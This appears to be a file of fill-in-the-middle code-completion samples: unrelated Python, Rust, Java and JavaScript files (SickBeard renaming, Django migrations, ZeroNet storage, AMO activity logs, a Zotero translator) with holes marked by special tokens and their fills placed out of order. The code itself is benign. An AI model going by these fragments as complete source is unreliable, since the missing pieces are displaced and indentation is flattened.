E03 ep_string = self._format_string(ep_format.upper(), replace_map) for other_ep in self.relatedEps: # for limited extend we only append the last ep if multi in (NAMING_LIMITED_EXTEND, NAMING_LIMITED_EXTEND_E_PREFIXED) and other_ep != self.relatedEps[ -1]: continue elif multi == NAMING_DUPLICATE: # add " - S01" ep_string += sep + season_format elif multi == NAMING_SEPARATED_REPEAT: ep_string += sep # add "E04" ep_string += ep_sep if multi == NAMING_LIMITED_EXTEND_E_PREFIXED: ep_string += 'E' <|fim▁hole|> if self.absolute_number == 0: curAbsolute_number = self.episode else: curAbsolute_number = self.absolute_number if self.season != 0: # dont set absolute numbers if we are on specials ! if anime_type == 1: # this crazy person wants both ! (note: +=) ep_string += sep + "%(#)03d" % { "#": curAbsolute_number} elif anime_type == 2: # total anime freak only need the absolute number ! (note: =) ep_string = "%(#)03d" % {"#": curAbsolute_number} for relEp in self.relatedEps: if relEp.absolute_number != 0: ep_string += '-' + "%(#)03d" % {"#": relEp.absolute_number} else: ep_string += '-' + "%(#)03d" % {"#": relEp.episode} regex_replacement = None if anime_type == 2: regex_replacement = r'\g<pre_sep>' + ep_string + r'\g<post_sep>' elif season_ep_match: regex_replacement = r'\g<pre_sep>\g<2>\g<3>' + ep_string + r'\g<post_sep>' elif ep_only_match: regex_replacement = ep_string if regex_replacement: # fill out the template for this piece and then insert this piece into the actual pattern cur_name_group_result = re.sub('(?i)(?x)' + regex_used, regex_replacement, cur_name_group) # cur_name_group_result = cur_name_group.replace(ep_format, ep_string) # logger.log(u"found "+ep_format+" as the ep pattern using "+regex_used+" and replaced it with "+regex_replacement+" to result in "+cur_name_group_result+" from "+cur_name_group, logger.DEBUG) result_name = result_name.replace(cur_name_group, cur_name_group_result) result_name = self._format_string(result_name, replace_map) logger.log(u"formatting pattern: " + pattern + " -> " + result_name, logger.DEBUG) return result_name def proper_path(self): """ Figures out the path where this episode SHOULD live according to the renaming rules, relative from the show dir """ anime_type = sickbeard.NAMING_ANIME if not self.show.is_anime: anime_type = 3 result = self.formatted_filename(anime_type=anime_type) # if they want us to flatten it and we're allowed to flatten it then we will if self.show.flatten_folders and not sickbeard.NAMING_FORCE_FOLDERS: return result # if not we append the folder on and use that else: result = ek.ek(os.path.join, self.formatted_dir(), result) return result def formatted_dir(self, pattern=None, multi=None): """ Just the folder name of the episode """ if pattern == None: # we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps: pattern = sickbeard.NAMING_ABD_PATTERN elif self.show.sports and sickbeard.NAMING_CUSTOM_SPORTS and not self.relatedEps: pattern = sickbeard.NAMING_SPORTS_PATTERN elif self.show.anime and sickbeard.NAMING_CUSTOM_ANIME: pattern = sickbeard.NAMING_ANIME_PATTERN else: pattern = sickbeard.NAMING_PATTERN # split off the dirs only, if they exist name_groups = re.split(r'[\\/]', pattern) if len(name_groups) == 1: return '' else: return self._format_pattern(os.sep.join(name_groups[:-1]), multi) def formatted_filename(self, pattern=None, multi=None, anime_type=None): """ Just the filename of the episode, formatted based on 
the naming settings """ if pattern == None: # we only use ABD if it's enabled, this is an ABD show, AND this is not a multi-ep if self.show.air_by_date and sickbeard.NAMING_CUSTOM_ABD and not self.relatedEps: pattern = sickbeard.NAMING_ABD_PATTERN elif self.show.sports and sickbeard.NAMING_CUSTOM_SPORTS and not self.relatedEps: pattern = sickbeard.NAMING_SPORTS_PATTERN elif self.show.anime and sickbeard.NAMING_CUSTOM_ANIME: pattern = sickbeard.NAMING_ANIME_PATTERN else: pattern = sickbeard.NAMING_PATTERN # split off the dirs only, if they exist name_groups = re.split(r'[\\/]', pattern) return helpers.sanitizeFileName(self._format_pattern(name_groups[-1], multi, anime_type)) def rename(self): """ Renames an episode file and all related files to the location and filename as specified in the naming settings. """ if not ek.ek(os.path.isfile, self.location): logger.log(u"Can't perform rename on " + self.location + " when it doesn't exist, skipping", logger.WARNING) return proper_path = self.proper_path() absolute_proper_path = ek.ek(os.path.join, self.show.location, proper_path) absolute_current_path_no_ext, file_ext = ek.ek(os.path.splitext, self.location) absolute_current_path_no_ext_length = len(absolute_current_path_no_ext) related_subs = [] current_path = absolute_current_path_no_ext if absolute_current_path_no_ext.startswith(self.show.location): current_path = absolute_current_path_no_ext[len(self.show.location):] logger.log(u"Renaming/moving episode from the base path " + self.location + " to " + absolute_proper_path, logger.DEBUG) # if it's already named correctly then don't do anything if proper_path == current_path: logger.log(str(self.indexerid) + u": File " + self.location + " is already named correctly, skipping", logger.DEBUG) return related_files = postProcessor.PostProcessor(self.location).list_associated_files( self.location, base_name_only=True, subfolders=True) #This is wrong. Cause of pp not moving subs. if self.show.subtitles and sickbeard.SUBTITLES_DIR != '': related_subs = postProcessor.PostProcessor(self.location).list_associated_files(sickbeard.SUBTITLES_DIR, subtitles_only=True, subfolders=True) absolute_proper_subs_path = ek.ek(os.path.join, sickbeard.SUBTITLES_DIR, self.formatted_filename()) logger.log(u"Files associated to " + self.location + ": " + str(related_files), logger.DEBUG) # move the ep file result = helpers.rename_ep_file(self.location, absolute_proper_path, absolute_current_path_no_ext_length) # move related files for cur_related_file in related_files: #We need to fix something here because related files can be in subfolders and the original code doesn't handle this (at all) cur_related_dir = ek.ek(os.path.dirname, ek.ek(os.path.abspath, cur_related_file)) subfolder = cur_related_dir.replace(ek.ek(os.path.dirname, ek.ek(os.path.abspath, self.location)), '') #We now have a subfolder. We need to add that to the absolute_proper_path. 
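            #e.g. (illustrative): an episode at /TV/Show/ep.mkv with a related file /TV/Show/Subs/ep.srt yields subfolder "/Subs", so the renamed related file keeps that nesting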
#First get the absolute proper-path dir
            proper_related_dir = ek.ek(os.path.dirname, ek.ek(os.path.abspath, absolute_proper_path + file_ext))
            proper_related_path = absolute_proper_path.replace(proper_related_dir, proper_related_dir + subfolder)

            cur_result = helpers.rename_ep_file(cur_related_file, proper_related_path,
                                                absolute_current_path_no_ext_length + len(subfolder))
            if not cur_result:
                logger.log(str(self.indexerid) + u": Unable to rename file " + cur_related_file, logger.ERROR)

        for cur_related_sub in related_subs:
            absolute_proper_subs_path = ek.ek(os.path.join, sickbeard.SUBTITLES_DIR, self.formatted_filename())
            cur_result = helpers.rename_ep_file(cur_related_sub, absolute_proper_subs_path,
                                                absolute_current_path_no_ext_length)
            if not cur_result:
                logger.log(str(self.indexerid) + u": Unable to rename file " + cur_related_sub, logger.ERROR)

        # save the ep
        with self.lock:
            if result:
                self.location = absolute_proper_path + file_ext
                for relEp in self.relatedEps:
                    relEp.location = absolute_proper_path + file_ext

        # in case something changed with the metadata just do a quick check
        for curEp in [self] + self.relatedEps:
            curEp.checkForMetaFiles()

        # save any changes to the database
        sql_l = []
        with self.lock:
            for relEp in [self] + self.relatedEps:
                sql_l.append(relEp.get_sql())

            if len(sql_l) > 0:
                myDB = db.DBConnection()
                myDB.mass_action(sql_l)

    def airdateModifyStamp(self):
        """
        Make the modify date and time of a file reflect the show air date and time.
        Note: Also called from postProcessor

        """
        hr = min = 0
        airs = re.search('.*?(\d{1,2})(?::\s*?(\d{2}))?\s*(pm)?', self.show.airs, re.I)
        if airs:
            hr = int(airs.group(1))
            hr = (12 + hr, hr)[None is airs.group(3)]
            hr = (hr, hr - 12)[0 == hr % 12 and 0 != hr]
            min = int((airs.group(2), min)[None is airs.group(2)])
        airtime = datetime.time(hr, min)

        if sickbeard.TIMEZONE_DISPLAY == 'local':
            airdatetime = sbdatetime.sbdatetime.convert_to_setting(
                network_timezones.parse_date_time(datetime.date.toordinal(self.airdate), self.show.airs,
                                                  self.show.network))
        else:
            airdatetime = datetime.datetime.combine(self.airdate, airtime).replace(tzinfo=tzlocal())

        filemtime = datetime.datetime.fromtimestamp(os.path.getmtime(self.location)).replace(tzinfo=tzlocal())

        if filemtime != airdatetime:
            import time

            airdatetime = airdatetime.timetuple()
            logger.log(str(self.show.indexerid) + u": About to modify date of '" + self.location
                       + "' to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime), logger.DEBUG)
            try:
                if helpers.touchFile(self.location, time.mktime(airdatetime)):
                    logger.log(str(self.show.indexerid) + u": Changed modify date of " + os.path.basename(self.location)
                               + " to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime))
                else:
                    logger.log(str(self.show.indexerid) + u": Unable to modify date of " + os.path.basename(self.location)
                               + " to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime), logger.ERROR)
            except:
                logger.log(str(self.show.indexerid) + u": Failed to modify date of '" + os.path.basename(self.location)
                           + "' to show air date " + time.strftime("%b %d,%Y (%H:%M)", airdatetime), logger.ERROR)

    def __getstate__(self):
        d = dict(self.__dict__)
        del d['lock']
        return d

    def __setstate__(self, d):
        d['lock'] = threading.Lock()
        self.__dict__.update(d)<|fim▁end|>
ep_string += other_ep._format_string(ep_format.upper(), other_ep._replace_map()) if anime_type != 3:
<|file_name|>0002_comment.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('blogg', '0001_initial'), ]<|fim▁hole|> migrations.CreateModel( name='Comment', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('content', models.TextField(max_length=1000L)), ('author', models.CharField(default=b'Anonymous', max_length=100, blank=True)), ('ip_address', models.GenericIPAddressField(null=True, blank=True)), ('user_agent', models.CharField(max_length=500L, blank=True)), ('published', models.BooleanField(default=True)), ('created', models.DateTimeField(auto_now_add=True)), ('modified', models.DateTimeField(auto_now=True, auto_now_add=True)), ('post', models.ForeignKey(related_name='comments', to='blogg.Post')), ], options={ 'ordering': ['-created'], }, bases=(models.Model,), ), ]<|fim▁end|>
operations = [
<|file_name|>ContentDbDict.py<|end_file_name|><|fim▁begin|>import time import os import ContentDb from Debug import Debug from Config import config class ContentDbDict(dict): def __init__(self, site, *args, **kwargs): s = time.time() self.site = site self.cached_keys = [] self.log = self.site.log self.db = ContentDb.getContentDb() self.db_id = self.db.needSite(site) self.num_loaded = 0 super(ContentDbDict, self).__init__(self.db.loadDbDict(site)) # Load keys from database self.log.debug("ContentDb init: %.3fs, found files: %s, sites: %s" % (time.time() - s, len(self), len(self.db.site_ids))) def loadItem(self, key): try: self.num_loaded += 1 if self.num_loaded % 100 == 0: if config.verbose: self.log.debug("Loaded json: %s (latest: %s) called by: %s" % (self.num_loaded, key, Debug.formatStack())) else: self.log.debug("Loaded json: %s (latest: %s)" % (self.num_loaded, key)) content = self.site.storage.loadJson(key) dict.__setitem__(self, key, content) except IOError: if dict.get(self, key): self.__delitem__(key) # File not exists anymore raise KeyError(key) self.addCachedKey(key) self.checkLimit() return content def getItemSize(self, key): return self.site.storage.getSize(key) # Only keep last 10 accessed json in memory def checkLimit(self): if len(self.cached_keys) > 10: key_deleted = self.cached_keys.pop(0) dict.__setitem__(self, key_deleted, False) def addCachedKey(self, key): if key not in self.cached_keys and key != "content.json" and len(key) > 40: # Always keep keys smaller than 40 char self.cached_keys.append(key) def __getitem__(self, key): val = dict.get(self, key) if val: # Already loaded return val elif val is None: # Unknown key raise KeyError(key) elif val is False: # Loaded before, but purged from cache return self.loadItem(key) def __setitem__(self, key, val):<|fim▁hole|> self.db.setContent(self.site, key, val, size) dict.__setitem__(self, key, val) def __delitem__(self, key): self.db.deleteContent(self.site, key) dict.__delitem__(self, key) try: self.cached_keys.remove(key) except ValueError: pass def iteritems(self): for key in dict.keys(self): try: val = self[key] except Exception as err: self.log.warning("Error loading %s: %s" % (key, err)) continue yield key, val def items(self): back = [] for key in dict.keys(self): try: val = self[key] except Exception as err: self.log.warning("Error loading %s: %s" % (key, err)) continue back.append((key, val)) return back def values(self): back = [] for key, val in dict.iteritems(self): if not val: try: val = self.loadItem(key) except Exception: continue back.append(val) return back def get(self, key, default=None): try: return self.__getitem__(key) except KeyError: return default except Exception as err: self.site.bad_files[key] = self.site.bad_files.get(key, 1) dict.__delitem__(self, key) self.log.warning("Error loading %s: %s" % (key, err)) return default def execute(self, query, params={}): params["site_id"] = self.db_id return self.db.execute(query, params) if __name__ == "__main__": import psutil process = psutil.Process(os.getpid()) s_mem = process.memory_info()[0] / float(2 ** 20) root = "data-live/1MaiL5gfBM1cyb4a8e3iiL8L5gXmoAJu27" contents = ContentDbDict("1MaiL5gfBM1cyb4a8e3iiL8L5gXmoAJu27", root) print "Init len", len(contents) s = time.time() for dir_name in os.listdir(root + "/data/users/")[0:8000]: contents["data/users/%s/content.json" % dir_name] print "Load: %.3fs" % (time.time() - s) s = time.time() found = 0 for key, val in contents.iteritems(): found += 1 assert key assert val print "Found:", found print 
"Iteritem: %.3fs" % (time.time() - s) s = time.time() found = 0 for key in contents.keys(): found += 1 assert key in contents print "In: %.3fs" % (time.time() - s) print "Len:", len(contents.values()), len(contents.keys()) print "Mem: +", process.memory_info()[0] / float(2 ** 20) - s_mem<|fim▁end|>
self.addCachedKey(key) self.checkLimit() size = self.getItemSize(key)
<|file_name|>_private.py<|end_file_name|><|fim▁begin|>from optparse import make_option from django.core.management.base import BaseCommand, CommandError from django.core.validators import URLValidator from django.core.exceptions import ValidationError class ADBaseCommand(BaseCommand): option_list = BaseCommand.option_list + ( make_option('--overwrite', action='store_true', dest='overwrite', default=False, help='Overwrite existed images'), ) url_validator = URLValidator() <|fim▁hole|> try: self.url_validator(url) return True except ValidationError, e: return False def handle(self, *args, **options): if options.get('overwrite'): self.stdout.write('==== Overwrite mode enabled, all of images will be re-download ===\n')<|fim▁end|>
def valid_url(self, url):
<|file_name|>variant-size-differences.rs<|end_file_name|><|fim▁begin|>#![deny(variant_size_differences)] <|fim▁hole|> V0(u8), VBig([u8; 1024]), //~ ERROR variant is more than three times larger } fn main() {}<|fim▁end|>
enum _En {
<|file_name|>log.py<|end_file_name|><|fim▁begin|># The absolute import feature is required so that we get the root celery # module rather than `amo.celery`. from __future__ import absolute_import from inspect import isclass from celery.datastructures import AttributeDict from tower import ugettext_lazy as _ __all__ = ('LOG', 'LOG_BY_ID', 'LOG_KEEP',) class _LOG(object): action_class = None class CREATE_ADDON(_LOG): id = 1 action_class = 'add' format = _(u'{addon} was created.') keep = True class EDIT_PROPERTIES(_LOG): """ Expects: addon """ id = 2 action_class = 'edit' format = _(u'{addon} properties edited.') class EDIT_DESCRIPTIONS(_LOG): id = 3 action_class = 'edit' format = _(u'{addon} description edited.') class EDIT_CATEGORIES(_LOG): id = 4 action_class = 'edit' format = _(u'Categories edited for {addon}.') class ADD_USER_WITH_ROLE(_LOG): id = 5 action_class = 'add' format = _(u'{0.name} ({1}) added to {addon}.') keep = True class REMOVE_USER_WITH_ROLE(_LOG): id = 6 action_class = 'delete' # L10n: {0} is the user being removed, {1} is their role. format = _(u'{0.name} ({1}) removed from {addon}.') keep = True class EDIT_CONTRIBUTIONS(_LOG): id = 7 action_class = 'edit' format = _(u'Contributions for {addon}.') class USER_DISABLE(_LOG): id = 8 format = _(u'{addon} disabled.') keep = True class USER_ENABLE(_LOG): id = 9 format = _(u'{addon} enabled.') keep = True # TODO(davedash): Log these types when pages are present class SET_PUBLIC_STATS(_LOG): id = 10 format = _(u'Stats set public for {addon}.') keep = True # TODO(davedash): Log these types when pages are present class UNSET_PUBLIC_STATS(_LOG): id = 11 format = _(u'{addon} stats set to private.') keep = True class CHANGE_STATUS(_LOG): id = 12 # L10n: {0} is the status format = _(u'{addon} status changed to {0}.') keep = True class ADD_PREVIEW(_LOG): id = 13 action_class = 'add' format = _(u'Preview added to {addon}.') class EDIT_PREVIEW(_LOG): id = 14 action_class = 'edit' format = _(u'Preview edited for {addon}.') class DELETE_PREVIEW(_LOG): id = 15 action_class = 'delete' format = _(u'Preview deleted from {addon}.') class ADD_VERSION(_LOG): id = 16 action_class = 'add' format = _(u'{version} added to {addon}.') keep = True class EDIT_VERSION(_LOG): id = 17 action_class = 'edit' format = _(u'{version} edited for {addon}.') class DELETE_VERSION(_LOG): id = 18 action_class = 'delete' # Note, {0} is a string not a version since the version is deleted. # L10n: {0} is the version number format = _(u'Version {0} deleted from {addon}.') keep = True class ADD_FILE_TO_VERSION(_LOG): id = 19 action_class = 'add' format = _(u'File {0.name} added to {version} of {addon}.') class DELETE_FILE_FROM_VERSION(_LOG): """ Expecting: addon, filename, version Because the file is being deleted, filename and version should be strings and not the object. 
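    e.g. (illustrative call, patterned on the log() docstring at the end of
    this module): amo.log(amo.LOG.DELETE_FILE_FROM_VERSION, 'old.xpi', addon, 'v1.0')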
""" id = 20 action_class = 'delete' format = _(u'File {0} deleted from {version} of {addon}.') class APPROVE_VERSION(_LOG): id = 21 action_class = 'approve' format = _(u'{addon} {version} approved.') short = _(u'Approved') keep = True review_email_user = True review_queue = True class PRELIMINARY_VERSION(_LOG): id = 42 action_class = 'approve' format = _(u'{addon} {version} given preliminary review.') short = _(u'Preliminarily approved') keep = True review_email_user = True review_queue = True class REJECT_VERSION(_LOG): # takes add-on, version, reviewtype id = 43 action_class = 'reject' format = _(u'{addon} {version} rejected.') short = _(u'Rejected') keep = True review_email_user = True review_queue = True class RETAIN_VERSION(_LOG): # takes add-on, version, reviewtype id = 22 format = _(u'{addon} {version} retained.') short = _(u'Retained') keep = True review_email_user = True review_queue = True class ESCALATE_VERSION(_LOG): # takes add-on, version, reviewtype id = 23 format = _(u'{addon} {version} escalated.') short = _(u'Escalated') keep = True review_email_user = True review_queue = True class REQUEST_VERSION(_LOG): # takes add-on, version, reviewtype id = 24 format = _(u'{addon} {version} review requested.') short = _(u'Review requested') keep = True review_email_user = True review_queue = True class REQUEST_INFORMATION(_LOG): id = 44 format = _(u'{addon} {version} more information requested.') short = _(u'More information requested') keep = True review_email_user = True review_queue = True class REQUEST_SUPER_REVIEW(_LOG): id = 45 format = _(u'{addon} {version} super review requested.') short = _(u'Super review requested') keep = True review_queue = True class COMMENT_VERSION(_LOG): id = 49 format = _(u'Comment on {addon} {version}.') short = _(u'Comment') keep = True review_queue = True hide_developer = True class ADD_TAG(_LOG): id = 25 action_class = 'tag' format = _(u'{tag} added to {addon}.') class REMOVE_TAG(_LOG): id = 26 action_class = 'tag' format = _(u'{tag} removed from {addon}.') class ADD_TO_COLLECTION(_LOG): id = 27 action_class = 'collection' format = _(u'{addon} added to {collection}.') class REMOVE_FROM_COLLECTION(_LOG): id = 28 action_class = 'collection' format = _(u'{addon} removed from {collection}.') class ADD_REVIEW(_LOG): id = 29 action_class = 'review' format = _(u'{review} for {addon} written.') # TODO(davedash): Add these when we do the admin site class ADD_RECOMMENDED_CATEGORY(_LOG): id = 31 action_class = 'edit' # L10n: {0} is a category name. format = _(u'{addon} featured in {0}.') class REMOVE_RECOMMENDED_CATEGORY(_LOG):<|fim▁hole|> # L10n: {0} is a category name. 
format = _(u'{addon} no longer featured in {0}.') class ADD_RECOMMENDED(_LOG): id = 33 format = _(u'{addon} is now featured.') keep = True class REMOVE_RECOMMENDED(_LOG): id = 34 format = _(u'{addon} is no longer featured.') keep = True class ADD_APPVERSION(_LOG): id = 35 action_class = 'add' # L10n: {0} is the application, {1} is the version of the app format = _(u'{0} {1} added.') class CHANGE_USER_WITH_ROLE(_LOG): """ Expects: author.user, role, addon """ id = 36 # L10n: {0} is a user, {1} is their role format = _(u'{0.name} role changed to {1} for {addon}.') keep = True class CHANGE_LICENSE(_LOG): """ Expects: license, addon """ id = 37 action_class = 'edit' format = _(u'{addon} is now licensed under {0.name}.') class CHANGE_POLICY(_LOG): id = 38 action_class = 'edit' format = _(u'{addon} policy changed.') class CHANGE_ICON(_LOG): id = 39 action_class = 'edit' format = _(u'{addon} icon changed.') class APPROVE_REVIEW(_LOG): id = 40 action_class = 'approve' format = _(u'{review} for {addon} approved.') editor_format = _(u'{user} approved {review} for {addon}.') keep = True editor_event = True class DELETE_REVIEW(_LOG): """Requires review.id and add-on objects.""" id = 41 action_class = 'review' format = _(u'Review {review} for {addon} deleted.') editor_format = _(u'{user} deleted {review} for {addon}.') keep = True editor_event = True class MAX_APPVERSION_UPDATED(_LOG): id = 46 format = _(u'Application max version for {version} updated.') class BULK_VALIDATION_EMAILED(_LOG): id = 47 format = _(u'Authors emailed about compatibility of {version}.') class BULK_VALIDATION_USER_EMAILED(_LOG): id = 130 format = _(u'Email sent to Author about add-on compatibility.') class CHANGE_PASSWORD(_LOG): id = 48 format = _(u'Password changed.') class PAYPAL_FAILED(_LOG): id = 51 format = _(u'{addon} failed checks with PayPal.') class MANIFEST_UPDATED(_LOG): id = 52 format = _(u'{addon} manifest updated.') class APPROVE_VERSION_WAITING(_LOG): id = 53 action_class = 'approve' format = _(u'{addon} {version} approved but waiting to be made public.') short = _(u'Approved but waiting') keep = True review_email_user = True review_queue = True class PURCHASE_ADDON(_LOG): id = 54 format = _(u'{addon} purchased.') class INSTALL_ADDON(_LOG): id = 55 format = _(u'{addon} installed.') class USER_EDITED(_LOG): id = 60 format = _(u'Account updated.') class ESCALATION_CLEARED(_LOG): id = 66 format = _(u'Escalation cleared for {addon}.') short = _(u'Escalation cleared') keep = True review_queue = True class APP_DISABLED(_LOG): id = 67 format = _(u'{addon} disabled.') short = _(u'App disabled') keep = True review_queue = True class ESCALATED_HIGH_ABUSE(_LOG): id = 68 format = _(u'{addon} escalated because of high number of abuse reports.') short = _(u'High Abuse Reports') keep = True review_queue = True class ESCALATE_MANUAL(_LOG): id = 73 format = _(u'{addon} escalated by reviewer.') short = _(u'Reviewer escalation') keep = True review_queue = True # TODO(robhudson): Escalation log for editor escalation.. class VIDEO_ERROR(_LOG): id = 74 format = _(u'Video removed from {addon} because of a problem with ' u'the video. 
') short = _(u'Video removed') class REREVIEW_DEVICES_ADDED(_LOG): id = 75 format = _(u'{addon} re-review because of new device(s) added.') short = _(u'Device(s) Added') keep = True review_queue = True class REVIEW_DEVICE_OVERRIDE(_LOG): id = 76 format = _(u'{addon} device support manually changed by reviewer.') short = _(u'Device(s) Changed by Reviewer') keep = True review_queue = True class CUSTOM_TEXT(_LOG): id = 98 format = '{0}' class CUSTOM_HTML(_LOG): id = 99 format = '{0}' class OBJECT_ADDED(_LOG): id = 100 format = _(u'Created: {0}.') admin_event = True class OBJECT_EDITED(_LOG): id = 101 format = _(u'Edited field: {2} set to: {0}.') admin_event = True class OBJECT_DELETED(_LOG): id = 102 format = _(u'Deleted: {1}.') admin_event = True class ADMIN_USER_EDITED(_LOG): id = 103 format = _(u'User {user} edited, reason: {1}') admin_event = True class ADMIN_USER_ANONYMIZED(_LOG): id = 104 format = _(u'User {user} anonymized.') admin_event = True class ADMIN_USER_RESTRICTED(_LOG): id = 105 format = _(u'User {user} restricted.') admin_event = True class ADMIN_VIEWED_LOG(_LOG): id = 106 format = _(u'Admin {0} viewed activity log for {user}.') admin_event = True class EDIT_REVIEW(_LOG): id = 107 action_class = 'review' format = _(u'{review} for {addon} updated.') class THEME_REVIEW(_LOG): id = 108 action_class = 'review' format = _(u'{addon} reviewed.') class GROUP_USER_ADDED(_LOG): id = 120 action_class = 'access' format = _(u'User {0.name} added to {group}.') keep = True admin_event = True class GROUP_USER_REMOVED(_LOG): id = 121 action_class = 'access' format = _(u'User {0.name} removed from {group}.') keep = True admin_event = True class REVIEW_FEATURES_OVERRIDE(_LOG): id = 122 format = _(u'{addon} minimum requirements manually changed by reviewer.') short = _(u'Requirements Changed by Reviewer') keep = True review_queue = True class REREVIEW_FEATURES_CHANGED(_LOG): id = 123 format = _(u'{addon} minimum requirements manually changed.') short = _(u'Requirements Changed') keep = True review_queue = True class CHANGE_VERSION_STATUS(_LOG): id = 124 # L10n: {0} is the status format = _(u'{version} status changed to {0}.') keep = True class DELETE_USER_LOOKUP(_LOG): id = 125 # L10n: {0} is the status format = _(u'User {0.name} {0.id} deleted via lookup tool.') keep = True class CONTENT_RATING_TO_ADULT(_LOG): id = 126 format = _('{addon} content rating changed to Adult.') review_queue = True class CONTENT_RATING_CHANGED(_LOG): id = 127 format = _('{addon} content rating changed.') class ADDON_UNLISTED(_LOG): id = 128 format = _(u'{addon} unlisted.') keep = True class BETA_SIGNED_VALIDATION_PASSED(_LOG): id = 131 format = _(u'{file} was signed.') keep = True class BETA_SIGNED_VALIDATION_FAILED(_LOG): id = 132 format = _(u'{file} was signed.') keep = True class DELETE_ADDON(_LOG): id = 133 action_class = 'delete' # L10n: {0} is the add-on GUID. format = _(u'Addon id {0} with GUID {1} has been deleted') keep = True LOGS = [x for x in vars().values() if isclass(x) and issubclass(x, _LOG) and x != _LOG] # Make sure there's no duplicate IDs. assert len(LOGS) == len(set(log.id for log in LOGS)) LOG_BY_ID = dict((l.id, l) for l in LOGS) LOG = AttributeDict((l.__name__, l) for l in LOGS) LOG_ADMINS = [l.id for l in LOGS if hasattr(l, 'admin_event')] LOG_KEEP = [l.id for l in LOGS if hasattr(l, 'keep')] LOG_EDITORS = [l.id for l in LOGS if hasattr(l, 'editor_event')] LOG_REVIEW_QUEUE = [l.id for l in LOGS if hasattr(l, 'review_queue')] # Is the user emailed the message? 
LOG_REVIEW_EMAIL_USER = [l.id for l in LOGS if hasattr(l, 'review_email_user')] # Logs *not* to show to the developer. LOG_HIDE_DEVELOPER = [l.id for l in LOGS if (getattr(l, 'hide_developer', False) or l.id in LOG_ADMINS)] def log(action, *args, **kw): """ e.g. amo.log(amo.LOG.CREATE_ADDON, []), amo.log(amo.LOG.ADD_FILE_TO_VERSION, file, version) """ from access.models import Group from addons.models import Addon from amo import get_user, logger_log from devhub.models import (ActivityLog, AddonLog, CommentLog, GroupLog, UserLog, VersionLog) from users.models import UserProfile from versions.models import Version user = kw.get('user', get_user()) if not user: logger_log.warning('Activity log called with no user: %s' % action.id) return al = ActivityLog(user=user, action=action.id) al.arguments = args if 'details' in kw: al.details = kw['details'] al.save() if 'details' in kw and 'comments' in al.details: CommentLog(comments=al.details['comments'], activity_log=al).save() # TODO(davedash): post-remora this may not be necessary. if 'created' in kw: al.created = kw['created'] # Double save necessary since django resets the created date on save. al.save() for arg in args: if isinstance(arg, tuple): if arg[0] == Addon: AddonLog(addon_id=arg[1], activity_log=al).save() elif arg[0] == Version: VersionLog(version_id=arg[1], activity_log=al).save() elif arg[0] == UserProfile: UserLog(user_id=arg[1], activity_log=al).save() elif arg[0] == Group: GroupLog(group_id=arg[1], activity_log=al).save() elif isinstance(arg, Addon): AddonLog(addon=arg, activity_log=al).save() elif isinstance(arg, Version): VersionLog(version=arg, activity_log=al).save() elif isinstance(arg, UserProfile): # Index by any user who is mentioned as an argument. UserLog(activity_log=al, user=arg).save() elif isinstance(arg, Group): GroupLog(group=arg, activity_log=al).save() # Index by every user UserLog(activity_log=al, user=user).save() return al<|fim▁end|>
id = 32 action_class = 'edit'
<|file_name|>BlockFilter.java<|end_file_name|><|fim▁begin|>package org.saga.shape; import org.bukkit.Material; import org.bukkit.block.Block; import java.util.HashSet; public class BlockFilter implements ShapeFilter { /** * Materials. */ private HashSet<Material> materials = new HashSet<>(); /** * If true then the check will return the reverse result. */ private boolean flip = false; // Initialisation: /** * Initialises. * */ public BlockFilter() { } /** * Adds a material. * * @param material * material */ public void addMaterial(Material material) { materials.add(material); } /** * Flips the check result. * */ public void flip() { flip = true; } // Filtering: /* * (non-Javadoc) * * @see org.saga.shape.ShapeFilter#checkBlock(org.bukkit.block.Block) */ @Override public boolean checkBlock(Block block) { if (flip) return !materials.contains(block.getType());<|fim▁hole|> } }<|fim▁end|>
return materials.contains(block.getType());
<|file_name|>WHO.js<|end_file_name|><|fim▁begin|>{ "translatorID": "cd587058-6125-4b33-a876-8c6aae48b5e8", "label": "WHO", "creator": "Mario Trojan, Philipp Zumstein", "target": "^http://apps\\.who\\.int/iris/", "minVersion": "3.0", "maxVersion": "", "priority": 100, "inRepository": true, "translatorType": 4, "browserSupport": "gcsibv", "lastUpdated": "2018-09-02 14:34:27" } /* ***** BEGIN LICENSE BLOCK ***** Copyright © 2018 Mario Trojan This file is part of Zotero. Zotero is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Zotero is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with Zotero. If not, see <http://www.gnu.org/licenses/>. ***** END LICENSE BLOCK ***** */ // attr()/text() v2 function attr(docOrElem,selector,attr,index){var elem=index?docOrElem.querySelectorAll(selector).item(index):docOrElem.querySelector(selector);return elem?elem.getAttribute(attr):null;} function text(docOrElem,selector,index){var elem=index?docOrElem.querySelectorAll(selector).item(index):docOrElem.querySelector(selector);return elem?elem.textContent:null;} function detectWeb(doc, url) { if (url.includes("/handle/") && text(doc, 'div.item-summary-view-metadata')) { var type = attr(doc, 'meta[name="DC.type"]', 'content'); //Z.debug(type); if (type && type.includes("articles")) { return "journalArticle"; } if (type && (type.includes("Book") || type.includes("Publications"))) { return "book"; } return "report"; } else if (getSearchResults(doc, true)) { return "multiple"; } } function getSearchResults(doc, checkOnly) { var items = {}; var found = false; var rows = doc.querySelectorAll('h4.artifact-title>a'); for (let i=0; i<rows.length; i++) { let href = rows[i].href; var title = rows[i].textContent; if (!href || !title) continue; if (checkOnly) return true; found = true; items[href] = title; } return found ? 
